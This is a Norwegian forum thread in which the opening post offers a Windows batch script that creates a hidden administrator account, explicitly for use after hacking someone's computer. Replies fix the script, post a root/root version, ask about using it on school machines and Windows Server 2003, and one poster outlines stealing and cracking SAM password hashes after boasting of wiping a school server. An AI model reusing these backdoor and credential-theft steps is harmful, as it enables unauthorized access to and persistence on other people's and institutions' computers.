Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  58 9359
Dette blir kanskje feil kategori siden denne guiden ikke har noe med hacking å gjøre i utganspunktet. Men meningen er å bruke denne metoden hvis du hacker noen og vil lage deg en egen skjult brukerkonto.

Skjult brukerkonto i Windows
Dette er bare en litt enklere metode for å lage brukerkontoer slik at du slipper å skrive "net user /add <bruker> <passord>" og gå inn i regedit for å sette dword verdien til 0. Dword="00000000" gjør slik at brukerkontoen ikke blir vist på login bildet under oppstarten.

Eksempel:
net user /add <bruker_navn> <passord>
net localgroup /add Administrators <bruker_navn>
echo REGEDIT4 >> bruker.reg
echo
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts] >> bruker.reg
echo
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] >> bruker.reg
echo "<bruker_navn>"=dword:00000000 >> bruker.reg
echo
regedit /s bruker.reg
del bruker.reg
Vis hele sitatet...
Lim dette inn i notepad, skift navn på <bruker_navn> og <passord> og lagre som filnavn.bat.

Dette batch scriptet vil lage en bruker.reg fil og legger til brukeren <bruker_navn> med passordet <passord> og sletter bruker.reg fila når scriptet er ferdig. Brukeren vil bli medlem av gruppen "Administratorer", scriptet vil også fjerne brukerkontoen fra login skjermen under oppstart og fra brukerkontoer i kontrollpanelet. Du kan derimot se kontoen hvis du skriver "net user" i kommandolinjen (Windows tast + R -> cmd).

Dette er testet på Windows XP Pro med SP1 og SP2 og jeg ser ingen grunn til at det ikke skal funke på Windows 2000 og 2003.

For å slette brukerkontoen skriver du "net user <bruker_navn> /delete"
▼ ... over en måned senere ... ▼
Eller du kan i windows xp Professional høyre klikke ->Min Datamaskin->Behandle->Lokale Grupper/Brukere->Brukere->Høyre klikke->Ny Bruker..-> skrive inn all info osv->Så høyreklikker du på den nye brukeren og trykker på egenskaper->så er det en tab som heter "Medlem av"(klikke der)->så velger du "Brukere" og trykker Fjern.
denne brukeren er ikke synlig i login screen osv dette er en enklere måte å lage brukere på syns jeg^^ , grafisk FTW:P

jeg legger bare denne til for at det finnes andre måter , er ikke sikkert det er samma prinsipp som måten din , men det er en måte.
administrator kontoen er heller ikke synlig på login skjermen på xp pro, kan like gjerne bruke den.
Sitat av Gubbe
administrator kontoen er heller ikke synlig på login skjermen på xp pro, kan like gjerne bruke den.
Vis hele sitatet...
jepp.

litt offtopic jeg dekrypterte alle passorda på pcn til en kompis her en dag for å demonstrere.
Da dekrypterte jeg passordet for en konto som he Hjelpeassistent , denne hadde faktisk et passord:S er det noen som vet hva denne kontoen er til? virker som den er default på alle xp installasjoner.
kanskje en Remote desktop "default" user?.

uansett så har jeg ikke gidda å forske no mer , men håper noen av dere vet hva den brukes til.
jeg har stengt alle kontoer på min boks bortsett fra den kontoen jeg bruker og admin kontoen.
ikke noe vits å ha sånt åpent.
▼ ... over en uke senere ... ▼
Nei, jeg har ikke så mye peiling.
Hvordan kommer jeg meg inn på en sjult brukerkonto om pc'en er låst ved login bilde?
Tittelninja
flexd's Avatar
Donor
Trykk ctrl+alt+del på XP login screenen, så kan du skrive inn brukernavn.
▼ ... noen uker senere ... ▼
kunnne noen skrevet om dette sån at det går med windows 2000 eller server 2003? tror det er anderledes paths i regestryen osv...

men der hadde man kanskje sett brukeren i det man logget inn ved og trykke på den "pilen" ned sånn at du kan velge brukernavn :P
Sitat av Cybergasm
Dette blir kanskje feil kategori siden denne guiden ikke har noe med hacking å gjøre i utganspunktet. Men meningen er å bruke denne metoden hvis du hacker noen og vil lage deg en egen skjult brukerkonto.

Skjult brukerkonto i Windows
Dette er bare en litt enklere metode for å lage brukerkontoer slik at du slipper å skrive "net user /add <bruker> <passord>" og gå inn i regedit for å sette dword verdien til 0. Dword="00000000" gjør slik at brukerkontoen ikke blir vist på login bildet under oppstarten.



Lim dette inn i notepad, skift navn på <bruker_navn> og <passord> og lagre som filnavn.bat.

Dette batch scriptet vil lage en bruker.reg fil og legger til brukeren <bruker_navn> med passordet <passord> og sletter bruker.reg fila når scriptet er ferdig. Brukeren vil bli medlem av gruppen "Administratorer", scriptet vil også fjerne brukerkontoen fra login skjermen under oppstart og fra brukerkontoer i kontrollpanelet. Du kan derimot se kontoen hvis du skriver "net user" i kommandolinjen (Windows tast + R -> cmd).

Dette er testet på Windows XP Pro med SP1 og SP2 og jeg ser ingen grunn til at det ikke skal funke på Windows 2000 og 2003.

For å slette brukerkontoen skriver du "net user <bruker_navn> /delete"
Vis hele sitatet...

funker ikke. kan du se over scriptet fort igjen ? : p
skal man bare lagre dette i notepad som .bat fil å vips så har man eg sjult konto? eller må man lage en koto først å så skrive brukernavet og passordet og så skrive bruker å pw i den batch fila?

anyone? 20 store tegn
Jeg leste guide om hvordan du enkelt kunne lage administrator bruker på skolen.
Når jeg prøvde fant jeg ut at du måtte være pålogget som administrator.. for en idiot som må ha skrevet den da, for det første kan jeg ikke passordet til en admin, for det andre kan jeg like så greit lage en bruker den vanlige måten hvis jeg kommer inn på en admin logg.
Må man legge tekstfila med scriptet i Windows-mappa for at det skal funke?

Og hvordan finner man den D-word mappa? Finner den ikke under regedit. Det kommer opp flere hundre mapper når jeg trykker på at undermappene skal vises, men jeg finner ingen d-word mappe.
Sist endret av nj6RVVcU$gEV$; 14. juni 2006 kl. 13:23.
Bare bytt ut <bruker> og <passord> og kjør batfilen. Trenger bare å gjøre det en gang.
Sitat av The Freak
Bare bytt ut <bruker> og <passord> og kjør batfilen. Trenger bare å gjøre det en gang.
Vis hele sitatet...
Men hvordan kjører jeg bat-filen? Har lagt det til inn i et tekstdokument.

http://i32.photobucket.com/albums/d1...n/Utennavn.jpg
Sist endret av Nichotin; 24. juni 2006 kl. 00:34.
Sitat av Kamma
Men hvordan kjører jeg bat-filen? Har lagt det til inn i et tekstdokument.
Vis hele sitatet...
Lagre som admin.bat og dobbel klikk på den....
Sist endret av Rejolo; 14. juni 2006 kl. 14:12.
Det som skjer når jeg dobbeltklikker på det da, er at jeg kommer inn på tekstdokumentet.

Men er det noen som har scriptet her? Det som ligger her fra før er quotet, og jeg tror det er noen mellomrom i scriptet som egentlig ikke skal være der. Kan hende det er derfor det ikke funker.
www.analbros.info
TurboAciid's Avatar
Sitat av Kamma
Men hvordan kjører jeg bat-filen? Har lagt det til inn i et tekstdokument.
Vis hele sitatet...
Velg Lagre som, velg så alle filer i filtype, og lagre den som admin.bat. Da blir det en kjørbar fil.

Og husk for all del å ta vekk <> rundt brukernavnet du velger. De er bare der for å illustrere at det er her brukernavnet ditt skal stå.
cbask: Hele poenget med scriptet er at du kan lage en skjult konto raskt når du kun har kommandolinje tilgang til maskinen.

Scriptet skal funke, som TurboAciid sier så må dere huske å ta vekk <> tegnene.
Superlurker
merulz's Avatar
En annen ting som gjør at det kanskje ikke funker på din maskin er:
Sitat av Engelsk WinXP
net localgroup /add Administrators <bruker_navn>
Vis hele sitatet...
Administators er engelsk, thus det funker bare på engelsk WinXP. På norsk blir det enkelt nok:
Sitat av Norsk WinXP
net localgroup /add Administratorer <bruker_navn>
Vis hele sitatet...
funker det og lage denne type konto selv om man ikke er administrator på pcen?
Er det bare jeg som ser en feil i scriptet? Det står "Wi ndows", og ikke "Windows". Det er klart at det ikke funker når det er en feil i pathen..
det funket hos meg:P
Funker dette på windows server 2003 (skolen vår)?
Sist endret av kinaputt; 14. juni 2006 kl. 17:54.
Engelsk Windows XP

Kode

net user /add root root
net localgroup /add Administrators root
echo REGEDIT4 >> bruker.reg
echo
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts] >> bruker.reg
echo
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList] >> bruker.reg
echo "root"=dword:00000000 >> bruker.reg
echo
regedit /s bruker.reg
del bruker.reg
Norsk Windows XP

Kode

net user /add root root
net localgroup /add Administratorer root
echo REGEDIT4 >> bruker.reg
echo
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts] >> bruker.reg
echo
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList] >> bruker.reg
echo "root"=dword:00000000 >> bruker.reg
echo
regedit /s bruker.reg
del bruker.reg
Lim inn det som står over så skal det funke. Mellomrommene i første post kommer av quoten.
Det over lager en bruker konto som heter root og som har passordet root.
Fjern mellomrommene "Wi ndowsNT" og "SpecialA ccounts" Vet ikke hvorfor det kommer mellomrom.

Er ikke 100% sikker på om det vil funke med 2003 server. Kan hende det er andre stier i registeret på 2003.

Hvis du slenger med kommandoen pause i bunnen av .bat filen så kan de sjekke om det kommer opp noen feilmeldinger.
jeg fikk det til og funke med mellomrom(?). Skal sjekke om dette funker på windows server 2003 i morgen på skolen.
Tror jeg fikk det til. Tok en screenshot av det som var på skjermen en liten stund:

http://i32.photobucket.com/albums/d1...Utennavn-1.jpg


Hva må jeg gjøre nå? Restarte? Eller skal jeg liksom være inne som admin etter at jeg har kjørt den admin-filen?


edit: Endret bildet til en link for å ikke fucke designet. - Nichotin
Sist endret av Nichotin; 24. juni 2006 kl. 00:33.
skriv "net user" i cmd og se om brukeren er blitt laget. hvis den er det...
trykk kryss. logg av-> i på loggnigs menyen trykk: Ctrl + Alt + delete. skriv brukernavn og passord.
Sitat av kinaputt
skriv "net user" i cmd og se om brukeren er blitt laget. hvis den er det...
trykk kryss. logg av-> i på loggnigs menyen trykk: Ctrl + Alt + delete. skriv brukernavn og passord.
Vis hele sitatet...
Jeg rekker ikke se hva som kommer opp når jeg gjør det. Det som kommer opp blir borte me en gang.
Kanksje jeg er dum nå, men hva er vitsen med en brukerkonto som er inaktiv og hvordan logger man på en inaktiv konto?
Sitat av Pope
Kanksje jeg er dum nå, men hva er vitsen med en brukerkonto som er inaktiv og hvordan logger man på en inaktiv konto?
Vis hele sitatet...
Les posten til kinaputt da.
Ordenens Seglbevarer
Ond^Sofa's Avatar
Sitat av Kamma
Jeg rekker ikke se hva som kommer opp når jeg gjør det. Det som kommer opp blir borte me en gang.
Vis hele sitatet...
Du må skrive det i kommandlinja. Start -> Kjør -> "cmd"

Der kan du skrive net users.
Okej.

Dette kommer opp:

http://i32.photobucket.com/albums/d1...Utennavn-2.jpg

Ser ikke ut for at den er aktiv da nei. Hvordan aktiverer jeg den da? Jeg må vel ikke legge den kjørbare fila i windows mappa eller noe?
Sist endret av Nichotin; 24. juni 2006 kl. 00:33.
Til opplysning: Du er mye snillere hvis du bruker alt+print screen, eller klipper vekk desktop'en i paint elns...
Altså, poenget med brukerkontoen er hvis du hacker en pc og vil lage deg en egen brukerkonto raskt som er skjult. Det er ikke noe vits å gjøre dette på sin egen maskin.

Edit: Kamma, skriv ordet pause i bunnen av .bat filen så får du tid til å lese det som kommer opp.
Sist endret av Cybergasm; 15. juni 2006 kl. 12:26.
Sitat av Cybergasm
Altså, poenget med brukerkontoen er hvis du hacker en pc og vil lage deg en egen brukerkonto raskt som er skjult. Det er ikke noe vits å gjøre dette på sin egen maskin.

Edit: Kamma, skriv ordet pause i bunnen av .bat filen så får du tid til å lese det som kommer opp.
Vis hele sitatet...
Grunne til at jeg gjør det her, er at det her er skole-pc`en min, og jeg er ikke administrator på pc`en, men det ser ut for at dette er sperret, for det er omtrent alt mulig annet. Får ikke installert noen programmer.
Takke og bukker!

Denne filen er nyttig i det batch baserte programe mitt der jeg skal legge de skriptene jeg har laget og funnet (JA JEG HAR FRITIDS!!! )

Jeg har blandt annet renaming av papirkurv, renaming av Internett explorerbar, en egen batch basert run funksjon og rundll32 kommandor og litt wbs, og masse annet rart.
den run greia di. Er det et skrift som gjør at man kommer til "run" i start menyen liksom?
hvist det er det er jeg innteresert?
Nei, ikke akuratt.
Men den funker helt likt!

(Lol jeg har lagt passord på batch filen og comprimert den til en exe filDDDDD)
Kan noen hjelpe meg med en slikt Php Script?
Kan ikke noe php, men hvis det er noen der som kan, så skriv det gjerne ned her, eller henvis meg til noen sider om det...
Prøver det med sjulte brukere på skolen til mandag..høres fett ut..^^
▼ ... noen uker senere ... ▼
Noen som har et slikt script til windows server 2003?
Jeg lagra det og kjørte det på PC'n til fatter'n og det funka ikke fordi jeg ikke er admin!
så jeg kjørte det på den ene PC'n min(hvor jeg er admin), og da virka det, bortsett fra at den ikke var skjult!!!!!!!!!
det er jo ikke noen vits i å gjøre det hvis den ikke blir skjult da!
Hvordan endrer man passordet på brukere man finner ved å bruke "net user"?

Vil gjerne få endret passordet til "Hjelpeassistent" brukere, grunnet jeg mistenker at faren til dama mi bruker denne til å snoke på hennes PC...
men hvordan kan man logge inn på administrator kontoen må no trykke "f8" i oppstarten for og komme inn på den eller? det og hacke en maskin er no lett som da jeg hacket skolenettverket og formaterte serveren HAHA:P:P

1. boot med knoppix (kobl inn usb med fat32 sys)
2. hent sam & security
3. bruk cain & abel ELLR saminside
PLING der er passordet til admin!

skriv i ie (evvt) :::: som i mitt tilfelle så hete serveren : === http://kou2s

§§TicsyBoy§§ http://www.sysfag.net
▼ ... over en uke senere ... ▼
men howthefuck bruke denne brukeren ffs?!?
▼ ... over en uke senere ... ▼
åssen får man den til å være skjult?
Kan folk holde seg til topic her?, det funker bare ikke hos meg!
kanskje den er lagra, men når jeg kommer til der alle kontoene står og trykker ctrl+alt+delete så skjer det ikke en dritt??
Sitat av cbask
Eller du kan i windows xp Professional høyre klikke ->Min Datamaskin->Behandle->Lokale Grupper/Brukere->Brukere->Høyre klikke->Ny Bruker..-> skrive inn all info osv->Så høyreklikker du på den nye brukeren og trykker på egenskaper->så er det en tab som heter "Medlem av"(klikke der)->så velger du "Brukere" og trykker Fjern.
denne brukeren er ikke synlig i login screen osv dette er en enklere måte å lage brukere på syns jeg^^ , grafisk FTW:P

jeg legger bare denne til for at det finnes andre måter , er ikke sikkert det er samma prinsipp som måten din , men det er en måte.
Vis hele sitatet...

ok, hvordan kommer jeg meg inn på en usynelig bruker da? er ganske no0b

Sitat av mikaelali
Kan folk holde seg til topic her?, det funker bare ikke hos meg!
kanskje den er lagra, men når jeg kommer til der alle kontoene står og trykker ctrl+alt+delete så skjer det ikke en dritt??
Vis hele sitatet...
jepp samma her, shekke en dritt
noen svar å få eller?????!?
http://www.windowsnetworking.com/art.../wxpplgon.html
If there is now a need to logon as an un-listed user, just pressed twice Control-Alt-Delete
Vis hele sitatet...
▼ ... noen måneder senere ... ▼
Hei!

Jeg får til å opprette en konto, men poenget blir borte når kontoen er synlig på oppstartsskjermen.
Hvordan får jeg denne til å bli skjult?

Takker for svar!


-Jenza